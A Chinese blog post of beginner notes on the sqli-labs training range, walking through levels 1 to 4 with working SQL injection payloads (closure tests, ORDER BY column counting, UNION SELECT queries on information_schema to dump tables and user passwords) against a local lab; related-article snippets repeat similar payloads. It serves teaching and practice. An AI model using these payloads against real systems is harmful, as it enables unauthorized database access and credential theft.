Sqli-Lab靶场-基础篇笔记

已于 2023-07-20 12:26:46 修改
阅读量1.6k 收藏 10
点赞数 5
CC 4.0 BY-SA版权
分类专栏: Sqlilab靶场练习 文章标签: sqlilab 小白
于 2018-11-26 12:52:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43400976/article/details/84535928

一. 首先判断注入类型,分为字符型与数字型两种。

关于数字型注入判断方法
/?id=1 and 1=1 页面显示正常 
/?id=1 and 1=2 页面显示不正常

原理是在Mysql数据库中,若字符为数字型,则查询代码类似于:SELECT * FROM users WHERE id=$id LIMIT 0,1

关于字符注入判断方法

一般字符型的六种包裹方式为:

'$id',"$id",('$id'),("$id"),(('$id')),(("$id"))

可以通过多次尝试不同方式的闭合,最终判断出此字段是哪种闭合方式。

二. 联合查询注入

Less-1

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1. 判断出闭合方式为单引号
在这里插入图片描述
2. 判断表的字段数

http://127.0.0.1/sql/Less-1/?id=1' order by 4--+
在这里插入图片描述

http://127.0.0.1/sql/Less-1/?id=1' order by 3--+
在这里插入图片描述
故可知表中的字段数为3

3.判断可显字段(报错+union联合查询)
http://127.0.0.1/sql/Less-1/?id=-1' union select 1,2,3--+
TIPS:此时id=X,X为表中不存在的id字段。目的是:在使用union联合查询时,令前面的输出数据(select * from users where id=-1)为空,而输出后面union查询的值。
可以在本地测试一下:结果如图所示。因此在此处,id = -1 或者 id = 1 and 1=2 或者 id = 999作用相同,也就是说数据库中是不会存在这些不正常的id值的,select 查询结果自然是会返回为空的。
在这里插入图片描述
4.在可显字段处进行下一步的注入,获取想要的信息

  1. 查询数据库名
    /Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+

  2. 查询表名
    Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='要查询的数据库名'--+

  3. 查询字段名
    /Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='表名' --+

  4. 查询字段内容
    /Less-1/?id=-1' union select 1,username,password from users--+
    TIPS:若要显示某字段全部内容,使用函数group_concat(),或用limit x,1一个个输出。

Less-2

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1. 判断出为数字型注入,方法在文章开头。

2. 判断表的字段数

http://127.0.0.1/sql/Less-2/?id=1 order by 4
在这里插入图片描述
http://127.0.0.1/sql/Less-2/?id=1 order by 3
在这里插入图片描述
3. 判断可显字段
http://127.0.0.1/sql/Less-2/?id=-1 union select 1,2,3
在这里插入图片描述
4.在可显字段处进行下一步的注入,获取想要的信息

  1. 查询数据库名
    /Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

  2. 查询表名
    Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='要查询的数据库名'

  3. 查询字段名
    /Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='表名'

  4. 查询字段内容
    /Less-2/?id=-1 union select 1,2,group_concat(username) from users

Less-3

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

字符型注入,闭合方式是 1') --+
注入流程同 Less-1

Less-4

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

字符型注入,闭合方式是 1") --+

三. 报错注入

原理: 当查询不回显内容时

最低0.47元/天 解锁文章

200万优质内容无限畅学
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9191
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
靶场——sqli-lab 1-4
ad12456的博客
04-11 1572
sqli_lab
sqli-labs靶场分析
RestoreJustice的博客
03-18 3543
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
Sqli-Lab靶场-进阶笔记
Pr0m1se1n的博客
03-22 758
Sqli-Lab靶场进阶笔记
SQLI-Lab靶场搭建
xinyue9966的博客
01-19 1321
SQLI靶场的搭建简言下载链接系统选择WindowsLinux访问方式本机内访问外部访问IP地址最终安装 简言 选择SQLI练习个人靶场搭建,是SQL注入学习的一种良好的方式,我也想针对目前的sql注入学习,做一个良好的检验效果,同时方便对每一个对渗透学习感兴趣的人整理一份学习笔记,留做参考。 下载链接 链接: SQLI下载. 系统选择 Windows 将文件解压到个人安装的集成环境网站根目录下,比如在C盘Program Files (x86)中安装phpstudy,那么你的根目录即为C:\Program
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和PHP的环境,例如使用wampserver或phpstudy等工具进行快速搭建。然后,将下载的sqli-labs-php7.zip解压到网站的根目录下,例如...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
sqli-labs靶场实战
u011417723的博客
03-08 6394
靶场实战
SQL实践之sqli-labs靶场(持续更新)
m0_62102520的博客
07-08 776
总结1、寻找注入点2、判断闭合方式3、验证漏洞4、判断列数及回显位5、取数据取数据库名根据数据库名,取表名根据数据库名、表名,取列名取具体数据。
sql-lab靶场
weixin_69374202的博客
05-17 251
1、找注入点,开始用1',发现单引号报错,尝试其它符号也不行,注入点不对,干脆去掉单引号,发现没报错,说明这个是注入点2、找列 =3 没有报错,确定是三列3、根据列数写查询数据库的语句(需要把union之前的改为一个查不到的数)
搭建靶场sqli-labs(详细附图)
weixin_44023403的博客
04-06 3013
搭建靶场sqli-labs一、搭建靶场二、遇到问题及解决办法; 一、搭建靶场 搭建sqli-labs靶场,首先需要搭建PHP环境,这里先下载一个PHPstudy,选择适应自己的版本,下载链接:https://www.xp.cn/ phpStudy装好之后,将SQLi-Labs解压,放到phpStudy安装目录下的/phpstudy_pro/WWW 修改/sqli-labs/sql-connections/credb.inc文件中mysql账号密码,使之能连接上数据库 查看phpstudy网站配置根目
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sql-lab靶场讲解
CN天狼
12-16 7040
sql-lab讲解
【精选详细】sql-labs通关(SQL注入11-25)
weixin_67832625的博客
07-28 1755
sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。
sqli_lab
ing_end的博客
03-05 3601
读写文件 此状态不允许导入导出状态 修改限制成功 – (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 显示位: 这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,
sqli-labs靶场(Less-1--Less-4)
weixin_46062722的博客
12-25 273
SQL注入流程: Less-1 来到第一关我们发现是要求给id这个参数一个值所以我们直接通过GET的方式提交ID的值即可 http://192.168.0.105:8086/sqlilabs/Less-1/index.php?id=1’ 我们发现提交ID值之后回显了用户名和登录密码,在后面加入单引号使其报错,报错结果为 这里为什么加上一个单引号会报错,基于SQL注入的原理就不在做过多的阐述,而是更多的放在漏洞的发现与利用!!! 在此我们推理下网页代码中的SQL注入语句: SELECT * FROM us
sql-labs靶场练习
m0_74097148的博客
03-04 822
这一关开始发现是post传参,是在输入框中输入,但总体思路不变一般POST型使用1' or 1=1 -- #和1" or 1=1 -- # 来判断闭合方式,成功的概率最大因单双引号引起的闭合问题更大点判断注入类型发现是字符型判断闭合方式(发现是单引号闭合)判断字段数(发现是两列)判断回显位(发现两列均可以回显) 判断数据库名 爆出表名 爆出列名 爆出用户名和密码采用“1\”直接爆出闭合方式为:(" ")判断字段数(发现是两列)如图是回显位爆出数据库名,语句和lese-1一样,闭合方式换换就可以了这关只有登录
sqli-lab靶场通关
最新发布
02-20
### 关于SQL注入实验室(sqli-lab)的解题思路 #### 实验室概述 SQLi-Labs 是一个用于学习和实践 SQL 注入漏洞利用技巧的开源项目。该项目提供了一系列具有不同复杂度级别的 Web 应用程序,旨在帮助安全研究人员理解和掌握各种类型的 SQL 注入攻击方法[^1]。 #### 基本准备 在开始尝试破解 sqli-lab 的各个关卡之前,确保已经安装并配置好了实验环境。通常情况下,可以通过 Docker 或者直接部署 PHP 和 MySQL 来运行这些练习实例。熟悉如何启动服务以及访问目标网站是非常重要的前提条件[^2]。 #### 解决方案概览 对于每一个挑战级别,解决过程大致可以分为以下几个方面: - **理解应用程序逻辑**:仔细阅读页面上的提示信息,了解输入字段的作用范围及其背后可能存在的查询语句结构。 - **识别潜在入口点**:通过测试不同的参数组合来发现哪些地方可能存在未被充分验证过的用户输入路径。 - **构建有效载荷(Payload)**:基于前面两步获得的知识,精心设计能够绕过防护机制并执行恶意命令的数据包内容。 下面给出一些具体场景下的通用策略和技术要点说明: ##### Level 1 - Error Based Injection 当遇到错误消息泄露型注入时,可利用单引号 `'` 导致语法异常进而触发数据库报错的方式来进行探测。例如,在登录表单中提交如下用户名: ```sql ' OR '1'='1 ``` 如果返回了不同于正常情况的结果,则表明存在该类别的弱点[^3]。 ##### Union Query Attack 联合查询是一种常见的高级技术,它允许攻击者将额外的选择子附加到原始请求之后从而获取更多有用的信息片段。比如构造这样的 URL 参数字符串: ```http ?id=1 UNION SELECT null, version(), database() ``` 这会使得服务器响应除了原本预期之外还包含了当前使用的 DBMS 版本号及默认库名等敏感资料[^4]。 请注意以上仅作为理论指导而非详尽的操作指南;实际操作过程中还需要考虑诸多因素如编码方式转换、字符集差异处理等等细节问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值